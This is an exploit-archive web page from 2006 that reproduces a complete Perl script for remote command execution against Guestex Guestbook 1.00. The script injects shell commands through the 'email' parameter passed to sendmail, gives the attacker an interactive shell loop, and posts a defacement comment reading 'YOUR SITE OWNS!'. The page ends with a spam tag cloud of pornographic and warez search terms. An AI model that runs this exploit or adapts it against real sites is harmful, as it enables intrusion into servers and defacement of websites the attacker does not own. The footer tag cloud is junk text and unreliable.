about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Guestex Guestbook 1.00 (email) Remote Code Execution Exploit




2006-06-08 Guestex Guestbook 1.00 (email) Remote Code Execution Exploit 
Rated as : High Risk

## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
## Name: GUESTEX-exec.pl
## Date: 06/07/2006
## Version: 1.00
##  1.00 (06/07/2006) - GUESTEX-exec.pl created
## 
## Description: GUESTEX guestbook is vulnerable to remote code execution
in how it 
##  handles it's 'email' parameter. $form{'email'} is used when openning a
pipe to 
##  sendmail in this manner: open(MAIL, "$sendmail $form{'email'})
where $form{'email'} 
##  is not properly sanitized.
##
## Usage: specify the host and location of the script as the first
argument. hosts can 
##  contain ports (host:port) and you CAN specify a single command to
execute via the 
##  commandline, although if you do not you will be given a shell like
interface to 
##  repeatedly enter commands.
#######################################################################################
use IO::Socket;
use strict;

my $host = $ARGV[0];
my $location = $ARGV[1];
my $command = $ARGV[2];
my $sock;
my $port = 80;
my $comment = $ARGV[3] || "YOUR SITE OWNS!\n";

if (!($host && $location)) { 
	die("-!> perl $0 <host[:port]> <location> [command]
[comment]\n");
}

$port = $1  if ($host =~ m/:(\d+)/);

while (1) { 
	my $switch = 0;
	if (!($ARGV[2])) {
		print 'guestex-shell$ ';
		chomp($command = <STDIN>);
	}

	my $cmd = ";echo --1337 start-- ;$command; echo --1337 end--";
	$cmd =~ s/(.)/sprintf("%%%x", ord($1))/ge;

	my $POST = "POST $location HTTP/1.1\r\n"  		             .
	           "Host: $host\r\n"                                   
     .
		   "User-Agent: mozilla\r\n"                                
.
	           "Content-type:
application/x-www-form-urlencoded\r\n"     .
		   "Content-length: " .
length("surname=ax0r&nationality=american&country of
residence=USA&preview=no&action=add&name=ax0r&site=ax0r
net&url=www.ax0r.net&location=atlanta,ga&rating=10&comment=$comment&email=ax0r\@yahoo.com$cmd")
. "\r\n" . 
		   "Referer: $host\r\n\r\n";
	
	$POST .= "surname=ax0r&nationality=american&country of
residence=USA&preview=no&action=add&name=ax0r&site=ax0r
net&url=www.ax0r.net&location=atlanta,ga&rating=10&comment=$comment&email=ax0r\@yahoo.com$cmd";
	
	$sock = IO::Socket::INET->new('PeerAddr' => "$host",
        	                      'PeerPort' => $port,
                	              'Proto'    => 'tcp',
				      'Type'     => SOCK_STREAM) or die ("-!> unable to
connect to '$host:$port': $!\n");

	$sock->autoflush();

	print $sock "$POST";

	#$switch = 1; # used for debugging if you think 'echo' might not be
working, etc
	 
	while (my $line = <$sock>) {
		if ($line =~ m/^\-\-1337\ start\-\-$/) {
			$switch = 1;
			next;
		}
		if ($line =~ m/^\-\-1337\ end\-\-$/) {
			close($sock);
			last;
		}
		print $line if $switch;
	}
	exit if $ARGV[2];
}
securitydot.net - 2006-06-08

Advertising

Copyright 2007, SecurityDot
Sun, 22 Nov 2009 06:43:17 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Crack Data F0tO sex banatnar www.sprayb brute root appserv wyt.zlwear 89***,com 200 /compo Karina kap Www.doodhw midnightmo 5pic Crack Data sexmovis 200 /compo Sex oldman www .sexoc indian cli www.madthu Www.telugu miniclip Crack Data Flog vervideosd www.madthu anema .ved www.sjzok. www.worldf vulnerabil www.trish www.cn2y.c WWW.SEXGRA Www pink w Crack Data Www.Tamil lynx explo poster fsc foot sex Www.dasepa Indiasexgr Www.warezw Crack Data Sex warkar www.ftflw. www.cn2y.c Video boke www.wapzon afghan six